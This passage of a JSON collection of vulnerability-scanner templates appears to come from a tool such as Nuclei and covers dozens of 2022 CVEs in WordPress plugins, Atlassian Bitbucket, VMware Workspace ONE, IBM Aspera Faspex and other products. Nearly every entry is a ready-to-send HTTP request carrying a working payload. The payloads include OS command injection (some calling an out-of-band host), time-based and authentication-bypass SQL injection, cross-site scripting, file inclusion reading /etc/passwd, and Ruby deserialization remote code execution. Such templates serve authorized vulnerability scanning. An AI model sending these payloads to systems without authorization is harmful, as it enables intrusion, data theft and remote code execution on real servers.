default')","contains(header_3,\"text/html\")","status_code_3==200"],"condition":"and"}]}]},{"id":"CVE-2022-40022","info":{"name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /controller/ping.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/controller/ping.php\n\ncurrentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+)"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-23944","info":{"name":"Apache ShenYu Admin Unauth Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"query success\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1020","info":{"name":"WordPress WooCommerce <3.1.2 - Arbitrary Function Call","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_key=a&perpose=update&callback=phpinfo\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-35405","info":{"name":"Zoho ManageEngine - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{RootURL}}/xmlrpc"],"body":"<?xml version=\"1.0\"?><methodCall><methodName>{{randstr}}</methodName><params><param><value>big0us</value></param></params></methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>faultString</name>"]},{"type":"word","part":"body","words":["No such service [{{randstr}}]","No such handler: {{randstr}}"],"condition":"or"},{"type":"word","part":"body","words":["<methodResponse>","</methodResponse>"],"condition":"or"}]}]},{"id":"CVE-2022-2544","info":{"name":"WordPress Ninja Job Board < 1.3.3 - Direct Request","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp/wp-content/uploads/wpjobboard/","{{BaseURL}}/wp-content/uploads/wpjobboard/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp/wp-content/uploads/wpjobboard","Index of /wp-content/uploads/wpjobboard"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40083","info":{"name":"Labstack Echo 4.8.0 - Open Redirect","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}//interactsh.com%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"location","regex":["^\\s*//interactsh.com/\\.\\."]},{"type":"status","status":[301]}]}]},{"id":"CVE-2022-3142","info":{"name":"NEX-Forms Plugin < 7.9.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 30s\nGET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code_2 == 200","contains(body_2, \"NEX-Forms\")","contains(content_type_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-39195","info":{"name":"LISTSERV 17 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31976","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_request HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-0381","info":{"name":"WordPress Embed Swagger <=1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/embed-swagger/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Embed Swagger","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["url: \"xss://\"-alert(document.domain)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25489","info":{"name":"Atom CMS v2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Path Array","console-debug"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25323","info":{"name":"ZEROF Web Server 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["back<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2022-2467","info":{"name":"Garage Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(7)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["Garage Billing Software"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2627","info":{"name":"WordPress Newspaper < 12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=\n"],"payloads":{"xss_payload":["--><form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<form><math><img onerror=alert(document.domain) src=1><mtext>","td-block-"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45354","info":{"name":"Download Monitor <= 4.7.60 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/download-monitor/v1/user_data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered\":","\"display_name\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44877","info":{"name":"CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password=toor&commit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Login Redirect."]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","group":1,"regex":["([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-24266","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\norder_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"list_admin_table\")"],"condition":"and"}]}]},{"id":"CVE-2022-47986","info":{"name":"IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /aspera/faspex/package_relay/relay_package HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n    i: x\\n- !ruby/object:Gem::SpecFetcher\\n    i: y\\n- !ruby/object:Gem::Requirement\\n  requirements:\\n    !ruby/object:Gem::Package::TarReader\\n    io: &1 !ruby/object:Net::BufferedIO\\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n         read: 0\\n         header: \\\"pew\\\"\\n      debug_output: &1 !ruby/object:Net::WriteAdapter\\n         socket: &1 !ruby/object:PrettyPrint\\n             output: !ruby/object:Net::WriteAdapter\\n                 socket: &1 !ruby/module \\\"Kernel\\\"\\n                 method_id: :eval\\n             newline: \\\"throw `id`\\\"\\n             buffer: {}\\n             group_stack:\\n              - !ruby/object:PrettyPrint::Group\\n                break: true\\n         method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-4050","info":{"name":"WordPress JoomSport <5.2.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmdId=1&shattr={\"id\":\"1+AND+(SELECT+1+FROM(SELECT+SLEEP(7))aaaa);--+-\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"jscaruselcont jsview2\")"],"condition":"and"}]}]},{"id":"CVE-2022-34590","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hms/admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Admin  | Dashboard</title>","Manage Patients","Manage Doctors"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34328","info":{"name":"PMB 7.3.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>' target='cart_info"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4897","info":{"name":"WordPress BackupBuddy <8.8.3 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"onload=alert(document.domain)\")","contains(body_2, \"BackupBudddy iFrame\")"],"condition":"and"}]}]},{"id":"CVE-2022-22954","info":{"name":"VMware Workspace ONE Access - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Authorization context is not valid"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-36804","info":{"name":"Atlassian Bitbucket - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /rest/api/latest/repos HTTP/1.1\nHost: {{Hostname}}\n","GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","words":["com.atlassian.bitbucket.scm.CommandFailedException"]},{"type":"status","status":[500]}],"extractors":[{"type":"json","name":"key","internal":true,"json":[".[\"values\"] | .[] | .[\"project\"] | .key"],"part":"body"},{"type":"json","name":"slug","internal":true,"json":[".[\"values\"] | .[]  | .slug"],"part":"body"},{"type":"regex","group":1,"regex":["uid=.*\\(([a-z]+)\\):"]}]}]},{"id":"CVE-2022-0412","info":{"name":"WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["Product not found"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-48012","info":{"name":"OpenCATS 0.9.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntag_title=<script>alert(document.domain);</script>\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"opencats - Login\")","contains(body_3, \"<script>alert(document.domain);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0271","info":{"name":"LearnPress <4.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"dismissed\":\"xxx<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37299","info":{"name":"Shirne CMS 1.2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cm9vd"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47945","info":{"name":"Thinkphp Lang - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?lang=../../thinkphp/base","{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Call Stack","class=\"trace"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-36537","info":{"name":"ZK Framework - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /login.zul HTTP/1.1\nHost: {{Hostname}}\n","POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Length: 154\n\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Disposition: form-data; name=\"nextURI\"\n\n/WEB-INF/web.xml\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<display-name>.*</display-name>","<welcome-file-list>((.|\n)*)welcome-file-list>","xml version","web-app"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"dtid","group":1,"regex":["dt:'(.*?)',cu:"],"internal":true}]}]},{"id":"CVE-2022-0651","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home'-sleep(6)-'&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-46073","info":{"name":"Helmet Store Showroom - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Helmet Store Showroom\")","contains(body, \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-41473","info":{"name":"RPCMS 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","rpcms"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43166","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-28080","info":{"name":"Royal Event - SQL Injection","severity":"high"},"requests":[{"raw":["POST /royal_event/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 353\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"login\"\n\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD--\n","POST /royal_event/btndates_report.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD\n\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"todate\"\n\n1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(\"{{randstr}}\"),0x1,0x2),NULL-- -\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"search\"\n\n3\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"fromdate\"\n\n01/01/2011\n------WebKitFormBoundaryFboH5ITu7DsGIGrD--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(\"{{randstr}}\")}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25148","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-42233","info":{"name":"Tenda 11N - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /index.asp HTTP/1.1\nHost: {{Hostname}}\nCookie: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword","Tenda 11N"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["GoAhead-Webs"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1442","info":{"name":"WordPress Metform <=2.1.3 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["mf_recaptcha_secret_key","admin_email_from"],"condition":"and"},{"type":"word","part":"header_2","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<option value=\\\"([0-9]+)\\\""],"internal":true}]}]},{"id":"CVE-2022-38817","info":{"name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/statestore","{{BaseURL}}/overview","{{BaseURL}}/controlplane"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Dapr Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26564","info":{"name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>","{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1","{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>javascript:alert('XSS')</script>","HotelDruid"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4447","info":{"name":"WordPress Fontsy <=1.8.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{{md5(num)}}\")"],"condition":"and"}]}]},{"id":"CVE-2022-25216","info":{"name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34267","info":{"name":"RWS WorldServer - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /ws-api/v2/users/me/details?token=02 HTTP/2\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"fullName\":\"System\""]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35151","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","\u56fe\u7247\u9884\u89c8"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26159","info":{"name":"Ametys CMS Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auto-completion>","<item>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29153","info":{"name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["PUT /v1/agent/check/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://oast.me\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n","PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["unknown field \"disable_redirects\""]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-29455","info":{"name":"WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '<= 3.5.5')"]},{"type":"word","part":"body","words":["Elementor Website Builder"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2022-25485","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertLightbox.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 